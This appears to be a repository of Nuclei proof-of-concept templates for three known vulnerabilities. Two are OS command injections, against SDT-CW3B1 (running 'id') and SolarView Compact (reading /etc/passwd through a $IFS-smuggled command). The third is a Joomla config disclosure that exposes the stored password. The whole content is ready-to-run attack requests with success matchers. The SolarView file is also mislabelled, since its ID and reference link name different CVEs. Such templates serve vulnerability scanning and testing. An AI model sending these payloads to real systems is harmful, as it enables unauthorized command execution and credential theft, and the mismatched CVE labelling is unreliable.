├── README.md
├── CVE-2021-46422.yaml
├── CVE-2022-30525.yaml
└── CVE-2023-23752.yaml


/README.md:
--------------------------------------------------------------------------------
1 | # Nuclei POC 模板
2 | 


--------------------------------------------------------------------------------
/CVE-2021-46422.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2021-46422
 2 | 
 3 | info:
 4 |   name: SDT-CW3B1 1.1.0 - OS command injection
 5 |   author: remote
 6 |   severity: high
 7 |   reference: 
 8 |     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
 9 |     - https://www.exploit-db.com/exploits/50936
10 |   tags: cve,cve2021
11 |   classification:
12 |     cve-id: CVE-2021-46422
13 | 
14 | requests:
15 |   - method: GET
16 |     path:
17 |       - "{{RootURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{exploit}}"
18 | 
19 |     payloads:
20 |       exploit:
21 |         - "id"
22 |     attack: pitchfork
23 |     matchers:
24 |       - type: regex
25 |         part: body
26 |         regex:
27 |           - "uid=.*"


--------------------------------------------------------------------------------
/CVE-2022-30525.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2022-30525
 2 | 
 3 | info:
 4 |   name: SolarView Compact 6.0 - OS Command Injection
 5 |   author: remote
 6 |   severity: high
 7 |   reference: 
 8 |     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
 9 |     - https://www.exploit-db.com/exploits/50940
10 |   tags: cve,cve2022
11 |   classification:
12 |     cve-id: CVE-2022-30525
13 | 
14 | requests:
15 |   - raw:
16 |       - |
17 |         POST /conf_mail.php HTTP/1.1
18 |         Host: {{Hostname}}
19 |         Content-Type: application/x-www-form-urlencoded
20 |         
21 |         mail_address=%3B{{exploit}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
22 |         
23 |         
24 |     payloads:
25 |       exploit:
26 |         - "cat${IFS}/etc/passwd"
27 |     attack: pitchfork
28 |     matchers:
29 |       - type: regex
30 |         part: body
31 |         regex:
32 |           - "root:.*:0:0"


--------------------------------------------------------------------------------
/CVE-2023-23752.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2023-23752
 2 | 
 3 | info:
 4 |   name: CVE-2023-23752-joomla
 5 |   author: cxaqhq
 6 |   severity: info
 7 |   description: description
 8 |   reference:
 9 |     - https://
10 |   tags: tags
11 | 
12 | requests:
13 |   - raw:
14 |       - |+
15 |         GET /api/index.php/v1/config/application?public=true HTTP/1.1
16 |         Host: {{Hostname}}
17 |         Cache-Control: max-age=0
18 |         Upgrade-Insecure-Requests: 1
19 |         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
20 |         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
21 |         Accept-Encoding: gzip, deflate
22 |         Accept-Language: zh-CN,zh;q=0.9
23 |         Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
24 |         Connection: close
25 |     matchers-condition: and
26 |     matchers:
27 |       - type: word
28 |         part: body
29 |         words:
30 |           - "password"
31 |           
32 |       - type: word
33 |         part: body
34 |         words:
35 |           - "attributes"
36 | 
37 |       - type: status
38 |         status:
39 |           - 200
40 | 
41 | 


--------------------------------------------------------------------------------